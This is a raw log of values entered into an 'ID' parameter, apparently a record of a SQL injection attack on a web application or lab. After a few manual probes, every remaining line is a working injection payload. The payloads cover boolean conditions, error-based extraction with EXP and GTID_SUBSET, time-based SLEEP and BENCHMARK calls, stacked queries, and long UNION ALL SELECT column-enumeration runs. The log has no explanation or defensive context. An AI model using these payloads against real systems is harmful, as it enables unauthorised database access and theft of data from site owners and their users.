ID:1
ID:1 and 1=1
ID:1  and 1=2
ID:1'
ID:1')
ID:1"
ID:1'
ID:1' order by 3-- 
ID:1' order by 4-- 
ID:1' order by 4-- 
ID:1' order by 3-- 
ID:1' order by 4-- 
ID:1' order by 3-- 
ID:1' union select 1,2,3-- 
ID:1'
ID:1
ID:5\
ID:1' union select 1,2,3-- 
ID:1
ID:1 and 1=1
ID:1 and 1=2
ID:1
ID:1'
ID:1'
ID:1' and 1=1
ID:1' and 1=2
ID:1' and
ID:1'
ID:1
ID:1
ID:7161
ID:1,(,.(()".'
ID:1'JjNTAt<'">fFCWfk
ID:1) AND 9971=8923 AND (3745=3745
ID:1) AND 8093=8093 AND (1481=1481
ID:1 AND 3918=9435
ID:1 AND 8093=8093
ID:1 AND 3115=2051-- WgOU
ID:1 AND 8093=8093-- cOFJ
ID:1') AND 7545=6196 AND ('Fpsp'='Fpsp
ID:1') AND 8093=8093 AND ('RQQK'='RQQK
ID:1' AND 1548=7695 AND 'wqtb'='wqtb
ID:1' AND 8093=8093 AND 'ugyU'='ugyU
ID:1' AND 5113=1309 AND 'XFlR'='XFlR
ID:(SELECT CONCAT(CONCAT(0x71706a7671,(CASE WHEN (2326=2326) THEN 0x31 ELSE 0x30 END)),0x71627a7071))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71706a7671,(SELECT (ELT(8164=8164,1))),0x71627a7071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'BCwg'='BCwg
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71706a7671,(SELECT (ELT(9549=9549,1))),0x71627a7071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'DOJM'='DOJM
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71706a7671,(SELECT (ELT(3881=3881,1))),0x71627a7071,0x78))x)) AND 'xjeJ'='xjeJ
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71706a7671,(SELECT (ELT(6102=6102,1))),0x71627a7071,0x78))x)) AND 'LTXG'='LTXG
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (ELT(4110=4110,1))),0x71627a7071),4110) AND 'mujh'='mujh
ID:(SELECT CONCAT(0x71706a7671,(ELT(9768=9768,1)),0x71627a7071))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'Audc'='Audc
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))NkjL)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))GWZt) AND 'kxsR'='kxsR
ID:1';SELECT BENCHMARK(5000000,MD5(0x45447369))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x59615752)) AND 'UYBG'='UYBG
ID:1' AND (SELECT 2351 FROM (SELECT(SLEEP(5)))fbdC) AND 'iAkT'='iAkT
ID:1' AND (SELECT 2351 FROM (SELECT(SLEEP(0)))fbdC) AND 'iAkT'='iAkT
ID:1' AND (SELECT 2351 FROM (SELECT(SLEEP(5)))fbdC) AND 'iAkT'='iAkT
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 2123-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x626f6a7a6b756e5965654f78716456526c6c525842716b4f6b42645a7241755547685351496f585a,0x71627a7071),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7671,0x47744c69554f6e79744d4e4d575a474576755345466252644c7041494a7246686c7350464b634769,0x71627a7071)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x574d574d6241786275735578664e6148766f794d724a686d5068474944626867675978786d5a654c,0x71627a7071),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x7a6e7968624b4c4f7763,0x71627a7071),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7671,0x75614e79524d6c624d56,0x71627a7071)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x58654e614d6d4445744a,0x71627a7071),NULL-- -
ID:-5601' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7671,0x6c6454504c666d6a6a566c4375474171776a4258697a6155656a686f49436e765a4d4a4272745566,0x71627a7071)-- -
ID:-5458' UNION ALL SELECT CONCAT(0x71706a7671,0x6c656e6a5350475875515558516d4e6c78715542456d5945666671684670616453696370624a6b62,0x71627a7071),NULL,NULL-- -
ID:-8137' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x4447724245655450704d78744c57484277584f495849686945524949725673716a6d564462535157,0x71627a7071),NULL-- -
ID:-8604' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7671,0x624b42626d5366745545,0x71627a7071)-- -
ID:-9873' UNION ALL SELECT CONCAT(0x71706a7671,0x644b6944726f554d4645,0x71627a7071),NULL,NULL-- -
ID:-4623' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x515059784e654f667a43,0x71627a7071),NULL-- -
ID:1' UNION ALL SELECT 44,44,CONCAT(0x71706a7671,0x654365617373497a554b6d4678685558734c6c4657795552626863564445476264644f6a7a797144,0x71627a7071)-- -
ID:1' UNION ALL SELECT 44,CONCAT(0x71706a7671,0x7a68534a5470525955795a7873684e7650656f44796f4f614d506451454442656658467059696546,0x71627a7071),44-- -
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x794247447a5a574774484448624d4466596c6b7a4d434e4e7050497a6b55616b78714b7145486242,0x71627a7071),44,44-- -
ID:1' UNION ALL SELECT 44,44,CONCAT(0x71706a7671,0x7865794a43544658614b,0x71627a7071)-- -
ID:1' UNION ALL SELECT 44,CONCAT(0x71706a7671,0x4241646f7a46784e474f,0x71627a7071),44-- -
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x43664161427275666853,0x71627a7071),44,44-- -
ID:-5091' UNION ALL SELECT CONCAT(0x71706a7671,0x44434967784f49507942556b52664b6e6647564645625977456152567071704963554d5173575663,0x71627a7071),44,44-- -
ID:-5143' UNION ALL SELECT 44,44,CONCAT(0x71706a7671,0x50745a5459674b4e5161656f4e6d65576e4c4f69484c5a476f724648426f774b4f7769774c464d64,0x71627a7071)-- -
ID:-4935' UNION ALL SELECT 44,CONCAT(0x71706a7671,0x4f46595243666c644763785475516f426278536264644d7442444242584559515559564642795044,0x71627a7071),44-- -
ID:-9393' UNION ALL SELECT CONCAT(0x71706a7671,0x5046534770434b67466a,0x71627a7071),44,44-- -
ID:-6125' UNION ALL SELECT 44,44,CONCAT(0x71706a7671,0x536e52734a7156537379,0x71627a7071)-- -
ID:-4554' UNION ALL SELECT 44,CONCAT(0x71706a7671,0x70795a75646751794844,0x71627a7071),44-- -
ID:1' UNION ALL SELECT NULL-- -
ID:1' UNION ALL SELECT NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x6652414b497644784d6e4e4659424c706245476775554a4676427076555862704e73486b766a5158,0x71627a7071),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7671,0x496559645673784e43456b735443427145626459664459686e53676f56614d687057635744767662,0x71627a7071)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x6f515650714a72665658575947614c6e79574455736a58444553674f6351635a4961737841685667,0x71627a7071),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x447a69734e7146654656,0x71627a7071),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7671,0x7a66474258797779785a,0x71627a7071)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x65525464566f41506d6b,0x71627a7071),NULL-- -
ID:-1691' UNION ALL SELECT CONCAT(0x71706a7671,0x7444504b446b6563757a706362727977464a65465750517566496c73636d6b46494d764a666a4244,0x71627a7071),NULL,NULL-- -
ID:-3804' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x63454f6176486f644b554c4867497143437267664e506b5054705a687342575271576d6177774944,0x71627a7071),NULL-- -
ID:-4071' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7671,0x436b69446f6273546d496e6d68477a754e6468516d74616a52526c6769614446434367597045765a,0x71627a7071)-- -
ID:-4703' UNION ALL SELECT CONCAT(0x71706a7671,0x51684b51755146496d69,0x71627a7071),NULL,NULL-- -
ID:-8502' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x4e654d7059716b62707a,0x71627a7071),NULL-- -
ID:-4537' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a7671,0x524a6c6c5741444b4c63,0x71627a7071)-- -
ID:1' UNION ALL SELECT 76,CONCAT(0x71706a7671,0x774d5553566a4e6965455865734f7752436461514d666d62544552556c44416d57644c686d41716d,0x71627a7071),76-- -
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x706a67446a626f664b6d775a616f717357726f4c585849474c667252474b6c4f5658574844735775,0x71627a7071),76,76-- -
ID:1' UNION ALL SELECT 76,76,CONCAT(0x71706a7671,0x706e47636a7a6846686c4a6e79594b4b4773617143494541526c59575a4c6553415148666c556b73,0x71627a7071)-- -
ID:1' UNION ALL SELECT 76,CONCAT(0x71706a7671,0x696a7662535346664443,0x71627a7071),76-- -
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x6e746e6a546c69525248,0x71627a7071),76,76-- -
ID:1' UNION ALL SELECT 76,76,CONCAT(0x71706a7671,0x6c655a77644a7946596c,0x71627a7071)-- -
ID:-4816' UNION ALL SELECT 76,CONCAT(0x71706a7671,0x434f61567469634969644e7468796f5872506876494545444142417759714c5455695a5a4467686d,0x71627a7071),76-- -
ID:-1030' UNION ALL SELECT CONCAT(0x71706a7671,0x70477a7a54547a6242646e44414f596d69587a417358496d646f757443714e4d6e754454696c6c73,0x71627a7071),76,76-- -
ID:-1319' UNION ALL SELECT 76,76,CONCAT(0x71706a7671,0x7a41575474756d6a6e577263617278496a77736e47554a437571775841755a7269734b4a794a6f6b,0x71627a7071)-- -
ID:-2518' UNION ALL SELECT 76,CONCAT(0x71706a7671,0x5552764a784556757a42,0x71627a7071),76-- -
ID:-8617' UNION ALL SELECT CONCAT(0x71706a7671,0x79756b7545554371714f,0x71627a7071),76,76-- -
ID:-9746' UNION ALL SELECT 76,76,CONCAT(0x71706a7671,0x794f6f434170464c4b71,0x71627a7071)-- -
ID:-1836' UNION ALL SELECT 76#
ID:-9988' UNION ALL SELECT 76,76#
ID:-4703' UNION ALL SELECT 76,76,76#
ID:-3096' UNION ALL SELECT 76,76,76,76#
ID:-6385' UNION ALL SELECT 76,76,76,76,76#
ID:-1811' UNION ALL SELECT 76,76,76,76,76,76#
ID:-4202' UNION ALL SELECT 76,76,76,76,76,76,76#
ID:-7407' UNION ALL SELECT 76,76,76,76,76,76,76,76#
ID:-9740' UNION ALL SELECT 76,76,76,76,76,76,76,76,76#
ID:-7706' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76#
ID:-4117' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76#
ID:-8876' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2826' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2060' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3080' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7236' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4283' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4052' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-5683' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2506' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x467162646a564a4a77636c4a49464f6158416d45736e4275424f68664442595468727649546c464d,0x71627a7071),76,76#
ID:1' UNION ALL SELECT 76,CONCAT(0x71706a7671,0x4572616558795a6572734870464b564b47794b5452574744527a45754e5442667067704c526a4f47,0x71627a7071),76#
ID:1' UNION ALL SELECT 76,76,CONCAT(0x71706a7671,0x775152584a70575975674f704279704f6f7871615a664e73557a476e6c744b66477a6b4b73715169,0x71627a7071)#
ID:1' UNION ALL SELECT CONCAT(0x71706a7671,0x787a6e676c526d61736f,0x71627a7071),76,76#
ID:1' UNION ALL SELECT 76,CONCAT(0x71706a7671,0x624b4b426d666178704d,0x71627a7071),76#
ID:1' UNION ALL SELECT 76,76,CONCAT(0x71706a7671,0x49536849707066496a48,0x71627a7071)#
ID:-5221' UNION ALL SELECT 76,76,CONCAT(0x71706a7671,0x6e697847506f6c657975594c6e6555634244784c6c586963625a4f6f4b4251506b4d706a4e52416b,0x71627a7071)#
ID:-7839' UNION ALL SELECT 76,CONCAT(0x71706a7671,0x796b6d776574496a4d4b4747495959626f446752496e4f4141777477594874647261746a5977735a,0x71627a7071),76#
ID:-3645' UNION ALL SELECT CONCAT(0x71706a7671,0x427149526f507a4e79645879736e47614f68465a4771726572507952767361596e61444a70647459,0x71627a7071),76,76#
ID:-8507' UNION ALL SELECT 76,76,CONCAT(0x71706a7671,0x5a674c65516c4b777957,0x71627a7071)#
ID:-3204' UNION ALL SELECT 76,CONCAT(0x71706a7671,0x7565784f776266445058,0x71627a7071),76#
ID:-2330' UNION ALL SELECT CONCAT(0x71706a7671,0x72705457504152627376,0x71627a7071),76,76#
ID:-4540' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3298' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7486' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2849' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2415' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-6935' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2658' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1409' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2541' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7798' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4785' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7760' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1919' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9134' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2559' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-8690' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1544' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4426' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-8150' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7506' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9595' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4254' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4061' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7223' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7479' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3970' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-5840' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1814' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2003' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1299' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2109' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3392' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-8756' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2252' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1443' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-5833' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9534' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3790' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2652' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9258' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4467' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3360' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2197' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-8012' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4777' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2592' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9397' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2807' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3844' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7272' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-5860' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7485' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4379' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3308' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4517' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9403' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1698' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9917' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
